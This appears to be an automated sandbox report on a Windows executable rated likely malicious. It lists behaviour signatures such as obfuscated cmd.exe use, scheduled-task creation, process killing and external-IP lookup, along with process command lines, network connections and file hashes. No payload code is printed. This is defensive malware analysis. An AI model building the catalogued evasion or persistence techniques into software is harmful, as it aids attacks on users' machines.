Analysis Overview
SHA256
4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
Threat Level: Likely malicious
The file xylex (1).exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Loads dropped DLL
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 10:30
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 10:30
Reported
2024-06-03 10:36
Platform
win7-20240419-en
Max time kernel
154s
Max time network
267s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\xylex (1).exe
"C:\Users\Admin\AppData\Local\Temp\xylex (1).exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6839758,0x7fef6839768,0x7fef6839778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2132 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2168 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3160 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3432 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3568 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3692 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3756 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3716 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2236 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2496 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3808 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3968 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=888 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=732 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3852 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=736 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3900 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3788 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2212 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2764 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2204 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2804 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Users\Admin\Downloads\xylex.exe
"C:\Users\Admin\Downloads\xylex.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1036325670512111022-3585524841769610654449926172724770581528381074-359282447"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=4132 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1960 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=736 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4260 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2320 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4324 --field-trial-handle=1228,i,4186482953405257907,13882293623882123005,131072 /prefetch:8
C:\Users\Admin\Downloads\xylex (1).exe
"C:\Users\Admin\Downloads\xylex (1).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 216.58.212.195:80 | www.gstatic.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
Files
\??\pipe\crashpad_2572_LMJYWYDFXRKGEGEQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 453961073b327260067320ff7f6f6f7c |
| SHA1 | fc0a753afb767aefa22a91fc7b0c95f004b2c38d |
| SHA256 | 7388f522bb6167c9d5d4255b5dc105fdfc7c8d58fc31748f8e3c1094ea4b9e1b |
| SHA512 | 0a658fe3d711c598d780294c03cf596d4d3ce8449cd5a32f348a70ea3caacc70f9dd26ca70601d55e559f5d2616760b73291cb08fbb4df494eb5d2ff8cbd9798 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fa6e9e43e7863d2a9dfb88bb841952e3 |
| SHA1 | cf58306a68b05de999c09e633f1fbb91c91b32e7 |
| SHA256 | 0a0fd936d5be8c602a538ee3289fa597141f30025041bf1aae3057daf30bd13c |
| SHA512 | 279d98162e3e7ca888a6f9219061755ee2c02646f3c41757de6713b879b3e63e7ac91a00aa5ad1feeaeb2761da83635bec11f377d416e666ca64bbc8daed1a9b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1b4b7af134756a3d47daa9c59c3e362b |
| SHA1 | 9341454293bb489f6872ccdcc7c4a5dac274d3f3 |
| SHA256 | 53aba708611e33506ff0382e4aaceb2348d0512bed09fcaa29cd148f93714851 |
| SHA512 | e485a2bcc69c49495c3fbe85fffdec70df94bfa7dbfa74d77addb6482a9cb49a5afab43c3bb31c74094bd9cedf65d063c27679e8b1e14783bdc8a458c820386c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e8712043642931ac9108c15a475c5c2f |
| SHA1 | 9f1e91817406dde357ce0d2e0778def3d5236072 |
| SHA256 | 81e0adafa19198134ebc62dd39f446d10731e8c935c1ce70ee5add149b0a5a0d |
| SHA512 | 47e065dfde826827f9f93286847b9aa62b37e4ce2982285204d48a4344af13155110546873a29ee33b54adff060218938d43d6357c4db2c6411c62954af2c665 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 760829d589e656aecaf08de28aac4811 |
| SHA1 | b83d9e5ff846346c6e9150edcddd1e817491eb28 |
| SHA256 | 44ab9565ca8af1d1e7c0d5e1a23bc25cc76478668c8c04fbf6fdbbdb311f892d |
| SHA512 | 7a89562b5d59853968a9ae3b25c0dbe3cf1fa63fa26827bdf2bdfd2c6a9502c6af22b7427cb42bfa69dfbcf3b48633487fc09c98f98ccde05c146ec306cb4b4f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\3b3a593a-6782-4b43-8e48-43d7328e34df.tmp
| MD5 | 8410344add70fc6e878cd84e8844c86c |
| SHA1 | 3b942b77f6405f912f51deff1874882da7807f28 |
| SHA256 | 084a492ca8832f198b979be054821e317066713f0f5c711049700262ffac31e3 |
| SHA512 | 853afbcb661d08be2a00a5e053e30cc4d27f3801985f1b2320acfef74b91d5d1dc1965c22d056df4d1d5d0afd8945c332f88cd3fb84003eb98a15d5793f64f75 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 80b357248435941254dbace65ab424d1 |
| SHA1 | 1573bf04326008fcb28bf6ecbf53cfee12700416 |
| SHA256 | 60289c672cbb50910e40322a4c2213e126513ce345fba93478cd45d81990e4b4 |
| SHA512 | ee89fcacd56f2b59d6a27ae5d97bd3a2f4e12df6a2aeee8f60481f7385a4043b126b3fd5738cd566ea07cb899a85c9f97fefed9247776a7c98ca25d619119ad2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar5DE0.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4fb8e0b3d6a0b08408075e6afefcc650 |
| SHA1 | 18bdc8a4c22b5d126ba47fc5ee7dcc59d518ab04 |
| SHA256 | 2728078b9562e53f9bacf542e7da3ec1eea75d5e1b6ab11e76d94400507f94bf |
| SHA512 | d24c9c0ec442ffedbc4d967fa2d35fa3d6242023c22f8f46f4210dd0a4407040eb624864f527c1c374d342684c679f91eff21d3c8951091a1c32dee1eed07f2b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1a430d13ab2086e8dcc663aaed8a1357 |
| SHA1 | c78808f52dab2b8e540e26231c49b6aee0559525 |
| SHA256 | b13a3d9733cac457ecda6b6b56f407394afb72af24f583ecc7fed8781efc5366 |
| SHA512 | 761837461635cb4bfbbc1a063788b69fd3c865be897bd0e7d8c8913bcfa9692e4601c2dbdb7791cb6884c8bc85052d343ce46f9c74d6813a456111175b2e5ca3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 086d0c6d2fc2bbd211cf654ac57fc202 |
| SHA1 | 62666ae9bf251139eaf89177d452983ba8adcfe5 |
| SHA256 | f2d6b3b83c599468b0f6592fa26fef510e8d2a325d0b7f3391e6fc78d9ba4647 |
| SHA512 | deb1e8debfe940cf9e6e4658ac1e48cc67c4f0a91d0626b4a429e3a6075103daaa91c04f0344d15a2d576565eb9e7c729779e3e7304ff663eff37dcd64a010f9 |
C:\Users\Admin\Downloads\xylex.exe
| MD5 | 8eacf3f9be7e3735352c4020fc4e05e9 |
| SHA1 | 0bb6c048d9e683e152de21f7d368a4c151095504 |
| SHA256 | 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e |
| SHA512 | 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7414c353637de260a5ed3b7f80cb8427 |
| SHA1 | 67d739e4349c72d04b1f899667624cbeb9b2f3e0 |
| SHA256 | 9b60c8fcbfbb8838812c305b6ec027a09ff2ed0a4d9e1e25d4a18fcab38afb50 |
| SHA512 | a79c5687bfb317c5a87cdba6b25091e4acae1d9e4d7b9244aa0c8afc87c97f3dbc191c04b9106a53e833a1701226f4984fbc59181a5c0a2ebb8aaa5bfba81ec8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9a90e16dac2719d093c76a5669881d64 |
| SHA1 | 6e86b2c79b2c51ed9645f231dbdb4555fa675fc3 |
| SHA256 | 29e2854071d21f9d1274d387f8b10889a3393d2fe66bc646c53d3f13324c7675 |
| SHA512 | 9375b075a6f23896343eec3c62c89654c0bc69ff5f2f2fea2c4352cd9bc1f1d97f2619869ee7500b56a3c58be7c2266c07cd6758a745276c2e7ebcba9b11e22c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 076255f1b4da689ff6fa9509580aa197 |
| SHA1 | ec4e44b0bbba250d4ef01f0cf0544317cbe37a75 |
| SHA256 | e0e2523458a02be5de0c49ff4882a6c54fda62c916771941bb2706aa34f95c0b |
| SHA512 | a376783eea30aebc69dee8983576844792f6d2ae97617647a3a33b8bcb249c828daef2945bf78eb695c124376676fb53aa5818ec2362358f3b6343c87784d6b8 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 10:30
Reported
2024-06-03 10:33
Platform
win10v2004-20240226-en
Max time kernel
11s
Max time network
33s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\xylex (1).exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xylex (1).exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
